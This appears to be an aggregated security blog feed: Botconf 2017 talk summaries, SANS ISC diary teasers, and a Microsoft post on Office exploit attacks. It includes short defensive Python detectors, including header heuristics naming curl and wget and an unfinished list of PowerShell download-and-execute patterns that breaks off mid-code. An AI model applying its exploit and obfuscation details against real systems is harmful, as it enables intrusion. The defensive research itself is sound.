The first batch of talks started with “KNIGHTCRAWLER, Discovering Watering-holes for Fun and Nothing” presented by Félix Aimé. This is Félix’s personal project that he started in 2016 to get his own threat intelligence platform. He started with some facts, like the definition of a watering hole: the insertion of malicious scripts on a specific website to infect its visitors. Usually, it is JavaScript plus an iframe that redirects to the malicious server, but it can also be a malvertising campaign (via banners). They are not easy to track because, on the malicious server, you can have protections like IP whitelists (in case of a targeted attack or to keep researchers away), browser fingerprinting, etc. Then he explained how he built his own platform and the techniques used to find suspicious activities: passive DNS, Common Crawl indexes, directory scraping, leaked DNS, … It is interesting to note that he uses YARA rules. In fact, he created his personal (legal) botnet. The architecture is based on a master server (the C&C) which talks to crawler servers. He is currently monitoring 25K targets. This is an ongoing project and Félix will keep improving it. Note that it is not publicly available. He also gave some nice examples of findings, like the keylogger on WordPress that we reported yesterday. He told me he detected it for the first time a few months ago! Very nice project!

The second talk was a complete review of the WannaCry attack that hit many organizations in May 2017: “The (makes me) Wannacry Investigation” presented by Alan Neville from Symantec. That was the last time the SANS ISC InfoCON was raised to yellow! Everybody remembers this bad story. Alan reviewed some major virus infections of the last years, like Blaster (2003) or Conficker (2008). These pieces of malware infected millions of computers but, in the case of WannaCry, “only” 300K hosts were infected. The impact, however, was much more important: factories, ATMs, billboards, health devices, etc. Then Alan reviewed some technical aspects of WannaCry and mentioned, of course, the famous kill-switch domain: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. In fact, Symantec had detected an early version of the ransomware a few months before (without the EternalBlue exploit). They also observed some attacks in March/April 2017. Basic security rules could have reduced the impact of the ransomware: have proper patching as well as backup/restore procedures.

After the morning coffee refill, Maria Jose Erquiaga came on stage to present “Malware Uncertainty Principle: an Alteration of Malware Behavior by Close Observation“. This talk presented a study of the influence of TLS interception on malware analysis. Indeed, today, more and more malware communicates over HTTPS. What happens if we play man-in-the-middle to intercept communications with the C&C server? Maria explained the lab that was deployed, with two scenarios: with and without an intercepting proxy.

Nomad Project Infrastructure

Once the project was in place, they analyzed many samples and captured all the traffic. The results of this research are available online (link). What did they find? Sometimes, there is no communication at all with the C&C because the malware uses a custom protocol over TCP/443, which is rejected by the proxy. Some samples tried to reconnect continuously or sought another way to connect (ex: via different ports).

The next one was “Knock Knock… Who’s there? admin admin, Get In! An Overview of the CMS Brute-Forcing Malware Landscape” presented by Anna Shirokova from Cisco. This talk was already given at BruCON but, being part of the organization, I was not able to follow it. This time was the right one. I maintain multiple WordPress sites and, I fully agree, brute-force attacks are constantly launched and pollute my logs. Anna started with a review of brute-force attacks and their targets. Did you know that ~5% of Internet websites run WordPress? This makes it a de-facto target. There are two types of brute-force attacks: vertical (a list of passwords is tested against one target) and horizontal (one password is tested against a list of targets). Brute-force attacks are not new; Anna made a quick recap from 2009 until 2015 with nice names like FortDisco, Mayhem, CMS Catcher, Troldesh, etc. And it’s still increasing… Then Anna focused on Sathurbot, a modular botnet with different features (downloader, web crawler and brute-forcer). The crawler module uses search engines to find a list of sites to be targeted (ex: “bing.com/search?q=makers%20manage%20manual“). Then the brute-force attack starts against /wp-login.php. Nice research, which revealed that the same technique is always used and that many WordPress instances still use weak passwords! (Note that it is difficult to measure the success rate of those brute-force attacks.)
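Spotting this kind of campaign in your own logs is straightforward. A hedged sketch, assuming a combined-format access log and an arbitrary threshold of my own choosing:

```python
from collections import Counter

def wp_login_bruteforcers(log_lines, threshold=10):
    """Count POSTs to /wp-login.php per client IP; flag IPs over a threshold."""
    hits = Counter()
    for line in log_lines:
        parts = line.split()
        # Combined log format: IP ident user [timestamp tz] "METHOD URI PROTO" ...
        if len(parts) > 6 and parts[5].strip('"') == "POST" and "/wp-login.php" in parts[6]:
            hits[parts[0]] += 1
    return {ip for ip, n in hits.items() if n >= threshold}
```

A vertical attack shows up as one IP over the threshold; a horizontal one needs the same counting done across several sites.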

Then Mayank Dhiman and Will Glazier presented “Automation Attacks at Scale or Understanding ‘Credential Exploitation’“. There exist many tools to steal credentials on the Internet and others to re-use them for malicious activities (account takeover, fake account creation, shopping bots, API abuse, etc). Several toolkits were briefly reviewed: SentryMBA, Fraudfox, AntiDetect, but also more classic tools like Hydra, curl, wget, Selenium, PhantomJS. The black market is full of services that offer configuration files for popular websites. According to their research, 10% of the Alexa top websites have a config file available on the black market (which describes how to abuse them, the API, etc). Top targets are gaming, entertainment and e-commerce websites. No surprise here. To abuse them, you need: a config file, stolen credentials, some IP addresses (for rotation) and some computing power. Credentials are quite easy to find; pastebin.com is your best friend. Note that attackers need good IP addresses; the best sources are cloud services, compromised IoT devices or proxy farms. They gave a case study about a large US retailer that was targeted from 40K IP addresses in 61 countries. But how to protect organizations against this kind of attack?

  • Analyze HTTP(S) requests and headers to fingerprint attack tools
  • Use machine learning to detect forged browser behaviour
  • Use threat intelligence
  • Data analytics (look for patterns)
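As a toy illustration of the first bullet, a request whose headers do not look like a real browser's can be scored. The header names, tool strings and weights below are invented for the example, not taken from the talk:

```python
def looks_automated(headers):
    """Score a request's headers for signs of an automation toolkit (toy heuristic)."""
    score = 0
    ua = headers.get("User-Agent", "")
    if not ua:
        score += 2              # real browsers always send a User-Agent
    if "Accept-Language" not in headers:
        score += 1              # real browsers send language preferences
    if any(t in ua.lower() for t in ("curl", "wget", "python-requests", "phantomjs")):
        score += 3              # self-identifying tools
    return score >= 2
```

Real defenses combine dozens of such signals (header order, TLS fingerprint, timing) rather than a handful of strings, since toolkits like SentryMBA spoof User-Agents by design.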

The next one was “The Good, the Bad, the Ugly: Handling the Lazarus Incident in Poland” presented by Maciej Kotowicz. Maciej came back on a big targeted attack that occurred in Poland. This talk was flagged as TLP:AMBER, so sorry, no coverage. If you are interested, here is a link with more info about Lazarus.

 

After the (delicious) lunch, Daniel Plohmann presented his project: “Malpedia: A Collaborative Effort to Inventorize the Malware Landscape“. Malpedia can be summed up in a few words: free, independent, resource-labeled, unpacked samples. The idea of Malpedia came up two years ago during Botconf: to propose a high-quality repository of malware samples (Daniel insisted on the fact that quality is better than quantity) properly analyzed and tagged. Current solutions (botnets.fr, theZoo, VirusBay.io) still have issues identifying samples properly. In Daniel’s project, samples are classified by family. What is a malware family? According to Daniel, it’s all samples that belong to the same project seen from a developer’s point of view. After explaining the collection process, he gave some interesting stats based on his current collection (as of today, 2491 samples from 669 families). Nice project; access is available upon request (if you meet Daniel IRL) or by being vouched for by other people. Malpedia is available here.

The next talk was… hard! When the speaker warns you that some slides will contain a lot of assembler code, you know what to expect! “YANT – Yet Another Nymaim Talk” was presented by Sebastian Eschweiler. What I was able to follow: Nymaim is a malware family that uses very complex anti-analysis techniques to defeat researchers and analysts. The main technique used is called “Heaven’s Gate“: a mechanism to call 64-bit kernel code directly from a 32-bit process. It is very useful to encrypt code, hide from static analysis tools and evade sandbox hooks.

After the afternoon coffee break, Amir Asiaee presented “Augmented Intelligence to Scale Humans Fighting Botnets“. It started with a fact: today, there are too many malware samples and too few researchers, so we need to automate as much as possible. Amir works for a company that gets feeds of DNS requests from multiple ISPs: 100B DNS queries per day! As malware moves faster than before (complex DGAs, shorter C&C lifetimes), there is a clear need for quick analysis of all this data. Amir explained how they process this huge amount of data using NLP (“Natural Language Processing”).

DNS Processing

The engineering challenge is to process all this data and to spot new core domains… when real time is key! There is a cool video about the data processing. Then Amir explained some use cases. Two interesting examples: Bedep uses exchange rates as its DGA seed… and some DGAs have too many collisions (ex: [a-z]{6}.com), which can lead to many false positives: what about akamai.com?
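The collision problem is easy to reproduce: pattern matching such as [a-z]{6}.com would flag akamai.com, which is why statistical scoring of the label helps. The scoring below (entropy plus vowel scarcity, with invented weights) is my own illustration, not the presented system:

```python
import math
from collections import Counter

def entropy(s):
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def dga_score(domain):
    """Crude DGA-ness heuristic on the core label: entropy plus a vowel-scarcity bonus."""
    label = domain.split(".")[0]
    vowels = sum(ch in "aeiou" for ch in label)
    return entropy(label) + (1.0 if vowels / max(len(label), 1) < 0.2 else 0.0)
```

Random-looking labels score high, while pronounceable brand names like akamai or google stay low, even when they match the same length pattern.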

The last talk covered the Stantinko botnet: “Stantinko: a Massive Adware Campaign Operating Covertly since 2012” by Matthieu Faou and Frédéric Vachon from ESET. It was a very nice review of the botnet. It started with some samples they received from a customer. They started reverse engineering and, when you discover that a DLL belonging to an MP3 encoder application decrypts and loads another one in memory, you are facing something very suspicious! They were able to sinkhole the C&C server and start further analysis. What about persistence? The malware creates two Windows services: PDS (Plugin Downloader Service) and BEDS (Browser Extension Downloader Service).

Stantinko Architecture

The purpose of the PDS is to compromise CMSs (WordPress and Joomla) and install a RAT and a Facebook bot. The BEDS is a flexible plugin system to install malicious extensions in the browser. Stantinko has many interesting anti-analysis features: the code is encrypted with a unique key per infection, so analysis requires finding the dropper and getting a sample plus its related context. There is a fileless plugin system. To get payloads, they had to code a bot mimicking an infected machine. What about the browser extension? The ad-fraud module injects ads on targeted websites or redirects the user to an ad website before showing the right one. They also replace ads with their own. Note that URLs are hashed in the config files! Another module is the search parser, which searches Google or Yandex for potential victims of brute-force attacks. Finally, a RAT module is also available. This botnet has an estimated size of 500K hosts. More details about Stantinko are available here.

The day ended with a good lightning talk session: 14 presentations in 1 hour! Some of them were really interesting, others very funny. In bulk mode, what was presented:

  • The Onyphe project
  • IoT Malware classification
  • Dropper analysis (https://malware.sekoia.fr)
  • Deft Linux (Free DFIR Linux distribution) DART deftlinux.net
  • Sysmon FTW
  • PyOnyphe: Onyphe Python library to use the API
  • Autopwn
  • Just a normal phishing
  • Context enrichment for IR
  • Yet another sandbox evasion: the “you_got_damn_right” HTTP header (gist.github.com/bcse/1834878)
  • Sysmon sigs for Linux honeypots
  • Malware config dynamic extraction (Gootkit)
  • IDA Appcall
  • A Knightcrawler demo (see above)

See you tomorrow for the last day!

[The post Botconf 2017 Wrap-Up Day #2 has been first published on /dev/random]



from Xavier

Wednesday, December 6, 2017

Botconf 2017 Wrap-Up Day #1

We reached December; it’s time for another edition of the Botconf security conference, fully dedicated to fighting botnets. This is already the fifth edition that I’m attending. This year, the beautiful city of Montpellier in the south of France is hosting the conference. I arrived on Monday evening to attend a workshop yesterday about TheHive, Cortex and MISP. As usual, I’m following the talks to propose you a wrap-up. Let’s go for the first one!

The introduction was not performed by “The Boss” (Eric Freyssinet), who was blocked by a last-minute change in his work agenda. But the crew was there to ensure a smooth event. What about the current edition? In a few numbers: 4 days, 3 workshops, 12 crew members, 300 attendees (+13%), 28 talks selected amongst 46 submissions and good food as usual. Some attendees have already renamed the event “Bouffeconf” (“bouffe” is colloquial French for a big spread of food). The crew also insisted on respect for the social media and TLP policies.

The keynote slot was filled by Sébastien Larinier and Robert Erra. The title was “How to Compute the Clusterization of a Very Large Dataset of Malware with Open Source Tools for Fun & Profit?”, which suggested a talk oriented toward machine learning. And it was indeed the case; the word appeared quickly on a slide. It was quite heavy for a keynote, with many mathematical formulas. The idea behind Sébastien and Robert’s research was to solve the following problem: based on a dataset of a few million malware samples, how to process them automatically to classify them into clusters or families and get more information about their differences. In such a complex task, scalability is important, but so is speed. The pipeline to process the samples is the following:

blob >> parser >> JSON data >> FV (Features Vector) >> Classification

They explained the available algorithms (KMeans and DBSCAN) and their differences. Follow the links if you are interested. Then they explained the issues they faced and finally gave some statistics.
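For illustration, here is a minimal hand-rolled KMeans over toy 2-dimensional feature vectors (think entropy and section count); a real pipeline would feed the full feature vectors to an optimized implementation such as scikit-learn's KMeans or DBSCAN rather than this sketch:

```python
def kmeans(points, centroids, iterations=10):
    """Minimal KMeans: assign each point to its nearest centroid, then recenter."""
    for _ in range(iterations):
        clusters = [[] for _ in centroids]
        for p in points:
            # Nearest centroid by squared Euclidean distance.
            best = min(range(len(centroids)),
                       key=lambda i: sum((a - b) ** 2 for a, b in zip(p, centroids[i])))
            clusters[best].append(p)
        # Recompute each centroid as the mean of its cluster (keep it if empty).
        centroids = [tuple(sum(col) / len(cl) for col in zip(*cl)) if cl else c
                     for cl, c in zip(clusters, centroids)]
    return centroids, clusters
```

Two well-separated malware families in feature space end up in two stable clusters; DBSCAN differs mainly in not needing the number of clusters up front.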

Malware Clustering

They also explained the architecture deployed to parse all those samples. But what is stored? A lot of information: hashes, the size and number of sections, names, entropy, characteristics, resources, entry point, import/export tables, strings, certificates, compilation date, etc. It is good research that is still ongoing. Note that Sébastien gives a workshop on this topic here and there at security conferences.

The first talk was titled “Get Rich or Die Trying” by Or Eshed and Mark Lechtik from Check Point. It started with a fact: many investigations start with a simple finding like an email… that is the “trigger”. In this case, the research performed by Check Point started from an email about an oil company (Aramco) targeting Saudi Arabia. Was it an APT? The investigation revealed, step by step, that it was not really an APT. They explained every step of the case, from the email to the different malware samples delivered via malicious Office documents.

Attacker Infrastructure

One of them was NetWire Lite, a RAT sold by worldwiredlabs.com. The second sample was a VB6-compiled program which was an info stealer (ISR Stealer). The next one was a HawkEye keylogger which steals FTP, HTTP and SMTP credentials but also… Minecraft!? Don’t ask why! These tools are definitively not what you find in an APT… so they downgraded the incident level. Going further, they finally found the Nigerian guy behind the attack. The main conclusion of this talk could be: this guy was able to create a big operation and cause damage with a limited skill set. What about a group of highly skilled people?

The next slot was assigned to “Exploring a P2P Transient Botnet – From Discovery to Enumeration” by Renato Marinho, a researcher and SANS ISC handler. Renato explained how he found a botnet and how he was able to reverse the communications with the C&C. How did it start? Simply with a Raspberry Pi running a honeypot at his home. The device was quickly infected (using the default Pi credentials) and he saw that it tried to establish a lot of connections to the Internet. Tip: when you’re running a honeypot, block (but log!) all connections to the wild Internet. He found that each member of the botnet could be a “Checker” or a “Scaro“, or both at the same time. A “Checker” is a dumb node while a “Scaro” is a C&C. Communications with the C&C were established via HTTPS, but the certificate was found in the binary. In this case, it’s easy to play MitM and intercept all communications. The set of commands was quite limited (“POST /ping”, “GET /upgrade”). The next step was to estimate the botnet size. The first technique was to crawl the botnet based on the IP addresses found in communications with the C&C. The second one was more interesting: Renato found that it was possible to join the botnet by changing some parameters in the communication protocol (easy to achieve via a tool like Burp Suite). Another interesting fact about this botnet: there was no persistence mechanism in place, which means that a reboot removes the malware… until the next infection! Very interesting research!

Then, Jakub Křoustek, Peter Matula and Petr Zemek, from Avast, presented a very nice tool called RetDec. This is an open-source machine-code decompiler. The first part of the talk was easy to understand: when a program is compiled, the compiler generates machine code but also optimizes it and reorganizes how data is managed. When you use a decompiler, you get code that is readable but far away from the original source. Usually, unreadable. There are also other techniques that make decompilation hard work: packers, obfuscation, anti-debugging techniques, etc. RetDec is trying to solve those issues… The goal is a generic decompilation of binary code. That was the easy part. In the second part of the talk, they explained in detail how the decompiler does the job, with many examples. It was really complex; I just trust them, RetDec can do a good job. The good news is that it will be released as an open-source project next week. Check retdec.com for more details. A good point for the IDA debugging plugin that can interact directly with RetDec! Impressive work by the Avast team…

After a long half-day, the lunch break was welcome. The afternoon started with “A Silver Path: Ideas for Improving Lawful Sharing of Botnet Evidence with Law Enforcement” by Karine e Silva from the University of Tilburg, NL. Not a technical talk at all, but Karine gave a very good overview of the issues between security researchers and law enforcement agencies. Indeed, under the law, attacking people or accessing non-authorized data is prohibited. But in the case of a botnet (just an example), the help of a researcher could be positive to help the LEA take down the C&C server. The project presented by Karine is called BotLeg (more information here):

The project is a consortium between TiU (TILT), SURFNet, SIDN, Abuse Information Exchange, and NHTCU. While the main focus of the research is the Netherlands, the project will develop a comparative analysis to include other EU countries. The project is financed via NWO and will last for 48 months. Among the expected legal research results, the BotLeg project will deliver sectorial guidelines and codes of conduct on anti-botnet operations.

Karine on Stage

 

Some points are quite difficult to address. Example: in some cases, hacking back is allowed but must be performed at the same level as the original attack. That’s not easy to quantify: what is an “aggressive” attack? Of course, the GDPR was mentioned because researchers also collect sensitive data.

The next talk was presented by two guys from CERT.pl (Jarosław Jedynak and Paweł Srokosz): “Use Your Enemies: Tracking Botnets with Bots“. Usually, bots are used for malicious activities, but they can serve many purposes: the collected data are used to identify and kill botnets. They explained the infrastructure they developed to analyze malware samples, decrypt C&C configurations and then act as a member of the botnet to gain more knowledge. Their ripper is, in fact, a modified version of Cuckoo plus homemade scripts.

Automated Malware Analysis Tool Chain

Interestingly, this is directly related to the previous talk: personal or sensitive information can be found. Once information about the botnet is discovered, it’s not always easy to infiltrate it, because you need to look legitimate (hostname, behaviour, uptime), wait some time before being able to fetch data, and sometimes the configuration is only available in specific countries.

The next talk was similar to the previous one but focused on SOCKS proxies: “SOCKs as a Service, Botnet Discovery” by Christopher Baker. IP addresses can be easily classified: there are blacklists, GeoIP databases, DNS, CGN, websites, etc. It’s easy to block them. But some IP addresses are very difficult to block because doing so would affect too many people (example: cloud services or ISPs). That’s why there is a (black) market for SOCKS proxies. This is really a pain for researchers and law enforcement agencies because many SOCKS proxies run on compromised computers in homes. Christopher explained how easy it is to “rent” such services for a small fee. In the second part of his talk, he explained how he infiltrated SOCKS proxy networks to gather more information about them. If I understood correctly, he used controlled hosts to join networks of proxies and see what was passing through them, like deploying a Tor exit node.

After the afternoon coffee break, Sébastien Mériot from OVH presented “Automation Of Internet-Of-Things Botnets Takedown By An ISP“. For an ISP, DDoS attacks can be catastrophic. Not only do they suffer from DDoS attacks, but some C&C servers can be hosted inside their infrastructure and, regarding the law, they can’t look at their customers’ data. Working from abuse reports isn’t useful because they generate a lot of noise, are often incomplete, or the malicious content is already gone. IoT botnets have been a pain during the last year and generate a lot of DDoS attacks. Finding them is not complicated (Shodan is your best friend), but how to recover information about the C&C servers? Sébastien explained how he performs some reverse engineering to extract juicy information. I like the way he uses Radare2 with r2pipe to get the assembly code of a sample and then greps for patterns of assembly code handling domains or IP addresses.
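The grep step can be approximated in a few lines. The r2pipe calls shown in the comment are standard radare2 usage, but the exact pipeline is my assumption; the extraction itself is plain regex over the strings/disassembly output:

```python
import re

# With radare2 installed, the input text would come from r2pipe, e.g.:
#   import r2pipe
#   r2 = r2pipe.open("sample.bin")
#   r2.cmd("aaa")            # analyze the binary
#   text = r2.cmd("izz")     # dump all strings
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b")

def extract_c2_candidates(text):
    """Pull IP- and domain-looking tokens out of disassembly or strings output."""
    ips = set(IP_RE.findall(text))
    domains = {d for d in DOMAIN_RE.findall(text) if not IP_RE.fullmatch(d)}
    return ips, domains
```

The candidates obviously need vetting (library strings, user-agent fragments and version numbers all match such patterns), but it is a fast way to shortlist C&C infrastructure.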

Then, Pedro Drimel Neto (Fox-IT) came on stage to present “The New Era of Android Banking Botnets“. It was an interesting review of some banking malware families that spread during the last years: Perkele, iBanking, GMbot and BankBot. For each of them, he reviewed the infection path, the C&C communications and the backend. If in previous years unencrypted communications occurred via SMS, today it’s quite different and the latest malware families are much better (from an attacker's perspective): strong encryption, anti-analysis, packing, C&C communications, etc. The distribution methods changed as well.

The last talk was an excellent review of the Gooligan botnet: “Hunting Down Gooligan” by Elie Bursztein and Oren Koriat. What is Gooligan? It was the first large-scale OAuth-stealing botnet. OAuth being used by all major actors on the Internet (Google, Microsoft, Facebook, Twitter, etc), you can imagine the impact of this botnet. The first version was detected in 2015 by Check Point and it was taken down in November 2016. In a nutshell, it was distributed as a repackaged known APK.

Gooligan in a Nutshell

Once decoded, the payload is downloaded, devices are rooted and persistence is configured. It modifies the install-recovery.sh file used when resetting the phone to factory settings, which makes it very difficult to get rid of the malware. After the technical details, the speakers explained the monetization techniques used by the botnet. There were two: app boosting and ad injection. Stolen OAuth tokens were used to interact with the Play Store to generate fake installs, reviews and searches. Indeed, real users on real phones are difficult to spot compared to “fraudulent” servers, as the C&C server had all the details needed to spoof the infected phones (IMEI, IMSI, brand, model, token, Android version, etc). The last step was to explain how the remediation was performed: the C&C server was sinkholed and the stolen tokens revoked. All users were notified, which is a challenge given the number of people (1M), different languages, technical skills, etc. I really liked this presentation.

The day finished with beers and pizza in a relaxed atmosphere. Stay tuned for a second wrap-up tomorrow!

[The post Botconf 2017 Wrap-Up Day #1 has been first published on /dev/random]



from Xavier

Saturday, December 2, 2017

[SANS ISC] Using Bad Material for the Good

I published the following diary on isc.sans.org: “Using Bad Material for the Good“:

There is a huge amount of information shared online by attackers. Once again, pastebin.com is a nice place to start hunting. As this material is available for free, why not use it for the good? Attackers (with or without bots) are constantly looking for entry points on websites. Those entry points are a good place to search, for example, for SQL injections… [Read more]

[The post [SANS ISC] Using Bad Material for the Good has been first published on /dev/random]



from Xavier

Friday, December 1, 2017

[SANS ISC] Phishing Kit (Ab)Using Cloud Services

I published the following diary on isc.sans.org: “Phishing Kit (Ab)Using Cloud Services“:

When you build a phishing kit, there are several critical points to address. You must generate a nice-looking page which matches the original as closely as possible, and you must work stealthily to not be blocked or, at least, be blocked as late as possible… [Read more]

[The post [SANS ISC] Phishing Kit (Ab)Using Cloud Services has been first published on /dev/random]



from Xavier

Wednesday, November 29, 2017

[SANS ISC] Fileless Malicious PowerShell Sample

I published the following diary on isc.sans.org: “Fileless Malicious PowerShell Sample“:

Pastebin.com remains one of my favourite places for hunting. I’m searching for juicy content and report findings in a Splunk dashboard:

Yesterday, I found an interesting pastie with a simple Windows CMD script… [Read more]

[The post [SANS ISC] Fileless Malicious PowerShell Sample has been first published on /dev/random]



from Xavier

"How Can I Tell This is an Attack? - Amazon Support Phish"

Quite a few folks have been asking how they can tell this Amazon email is a phish. Below are the indicators. I like this example as it demonstrates how the bad guys are constantly evolving and adapting their attacks. Notice in this email how there is no malicious link or infected attachment to click on, … Continue reading How Can I Tell This is an Attack? - Amazon Support Phish

from lspitzner

Thursday, November 23, 2017

[SANS ISC] Proactive Malicious Domain Search

I published the following diary on isc.sans.org: “Proactive Malicious Domain Search“:

In a previous diary, I presented a dashboard that I’m using to keep track of the DNS traffic on my networks. Tracking malicious domains is useful but what if you could, in a certain way, “predict” the upcoming domains that will be used to host phishing pages? Being a step ahead of the attackers is always good, right? Thanks to the CertStream service (provided by Cali Dog Security), you have access to a real-time certificate transparency log update stream… [Read more]
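To give an idea of how such "prediction" can work, here is a minimal sketch of a domain-scoring heuristic in the spirit of tools built on top of CertStream. The keyword list, weights, and threshold are invented for illustration only:

```python
# Illustrative scoring of hostnames seen in a certificate-transparency
# stream; keywords and weights below are made up for this sketch.
SUSPICIOUS_KEYWORDS = {
    "login": 2, "secure": 1, "account": 2, "verify": 2,
    "paypal": 3, "appleid": 3, "banking": 2, "update": 1,
}

def phishing_score(hostname):
    """Crude heuristic: sum keyword weights, then add points for deep
    subdomain chains and hyphen-heavy labels, both common in phishing."""
    host = hostname.lower()
    score = sum(w for kw, w in SUSPICIOUS_KEYWORDS.items() if kw in host)
    score += max(0, host.count(".") - 1)   # many subdomain levels
    score += host.count("-")               # e.g. paypal-secure-login-...
    return score

def is_suspicious(hostname, threshold=5):
    return phishing_score(hostname) >= threshold
```

Feeding every hostname from the certificate stream through such a filter yields a short list of candidate phishing domains, often before the pages go live.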


[The post [SANS ISC] Proactive Malicious Domain Search has been first published on /dev/random]



from Xavier

Tuesday, November 21, 2017

ISC Top-100 Malicious IP: STIX Feed Updated

Based on my previous ISC SANS Diary, I updated the STIX feed to answer the requests made by some readers. The feed is now available in two formats:

  • STIX 1.2 (XML) (link)
  • STIX 2.0 (JSON) (link)

They are updated every 2 hours. Enjoy!
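For readers who want to consume the STIX 2.0 (JSON) flavour programmatically, here is a hedged sketch. It assumes the feed is a standard STIX 2.0 bundle whose indicator patterns use the `ipv4-addr:value` comparison, which is the usual way IP indicators are expressed in STIX 2.0 patterning:

```python
import json
import re

def extract_ips_from_stix2(bundle_json):
    """Collect IPv4 values from indicator patterns in a STIX 2.0 bundle.
    Assumes patterns of the usual form: [ipv4-addr:value = '192.0.2.1']"""
    bundle = json.loads(bundle_json)
    ip_re = re.compile(r"ipv4-addr:value\s*=\s*'([^']+)'")
    ips = []
    for obj in bundle.get("objects", []):
        if obj.get("type") == "indicator":
            ips.extend(ip_re.findall(obj.get("pattern", "")))
    return ips
```

The resulting list of IPs can then be pushed to a firewall blocklist or a SIEM watchlist.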

[The post ISC Top-100 Malicious IP: STIX Feed Updated has been first published on /dev/random]



from Xavier

Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks

The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits and highlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how Office 365 Advanced Threat Protection, Windows Defender Advanced Threat Protection, and Windows Defender Exploit Guard protect customers from these exploits.

Exploit attacks in Fall 2017

The discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like ransomware and info stealers for financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced, multi-stage implants.

The Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.

CVE-2017-0199

CVE-2017-0199 is a remote code execution (RCE) vulnerability in Microsoft Office that allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore the Protected View warning message. The vulnerability, a logic bug in the URL moniker that executes HTA content using the htafile OLE object, was fixed in the April 2017 security updates.

Figure 1. CVE-2017-0199 exploit code

Ever since FireEye blogged about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking it up from publicly available exploit generator toolkits. As shown in Figure 2, the creator and lastModifiedBy attributes help identify the use of such toolkits in generating exploit documents.

Figure 2. Exploit kit identifier
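The creator/lastModifiedBy check can be reproduced offline: OOXML files (docx, pptx, xlsx) are ZIP archives whose docProps/core.xml part carries both fields. A minimal sketch of extracting them:

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML core-properties namespaces.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}

def ooxml_author_fields(data):
    """Return (creator, lastModifiedBy) from an OOXML file's
    docProps/core.xml, or (None, None) if the part is absent."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        try:
            core = z.read("docProps/core.xml")
        except KeyError:
            return (None, None)
    root = ET.fromstring(core)
    creator = root.findtext("dc:creator", namespaces=NS)
    modifier = root.findtext("cp:lastModifiedBy", namespaces=NS)
    return (creator, modifier)
```

Comparing these fields across a corpus of malicious documents makes toolkit-generated samples stand out quickly.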

A slight variation of this exploit, this time in the script moniker, was also released. When activated, this exploit can launch scriptlets (which consist of HTML code and script) hosted on a remote server. A publicly available proof-of-concept (PoC) used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute remote code, as shown in Figure 3.

Figure 3. PPSX activation for script moniker

CVE-2017-8570

The July 2017 security update from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, CVE-2017-8570, which was discovered in the URL moniker and, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as a zero-day, the public availability of an exploit toolkit created a wave of malicious PPSX attachments.

CVE-2017-8759

In September 2017, FireEye discovered another exploit used in targeted attacks. The CVE-2017-8759 exploit takes advantage of a code injection vulnerability in the .NET Framework when parsing WSDL definitions using the SOAP moniker. The vulnerability was fixed in the September 2017 security update. The original exploit used an HTA file, similar to CVE-2017-0199, to execute the attacker's code on vulnerable machines. This exploit piqued our interest because it delivered one of the most complex, multi-layered VM-protected malware families, FinFisher, whose techniques we discuss in a later section.

The CVE-2017-8759 exploit was soon ported to PPSX files. Figure 4 below shows an example of the exploit.

Figure 4. CVE-2017-8759 exploit

CVE-2017-11826

Finally, on September 28, 2017, Qihoo 360 identified an RTF file used in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the October 2017 security update. Forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that triggered the bug.

Figure 5. CVE-2017-11826 exploit

Payloads

Except for the memory corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which can make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates can make things challenging for incident responders.

As cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:

  • Attackers used HLFL as an element type in malicious RTF attachments. This element is not part of the official RTF specification, but it serves as effective obfuscation against static detections.

  • Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.
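A naive scanner for these markers only needs to tokenize RTF control words; the sketch below hard-codes the three control words cited above and nothing else, so it is illustrative rather than a complete detection:

```python
import re

# Control words cited in the text as obfuscation markers; unknown words
# like these are ignored by RTF parsers but defeat naive signatures.
BOGUS_RTF_WORDS = {"hlfl", "atnref", "meqarr"}

def find_bogus_control_words(rtf_bytes):
    """Return the set of known-bogus control words present in raw RTF."""
    words = re.findall(rb"\\([a-z]+)", rtf_bytes, flags=re.IGNORECASE)
    found = {w.decode().lower() for w in words}
    return found & BOGUS_RTF_WORDS
```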

In most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.

Figure 6. PowerShell payload from the HTA file
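A defender-side heuristic for such PowerShell cradles can key on the download-and-execute primitives. The sketch below is illustrative and far from a complete ruleset; it also decodes `-EncodedCommand` arguments, which PowerShell expects as base64 of UTF-16LE text:

```python
import base64
import re

# Heuristic markers of a PowerShell download-and-execute cradle
# (illustrative, not a complete detection ruleset).
CRADLE_PATTERNS = [
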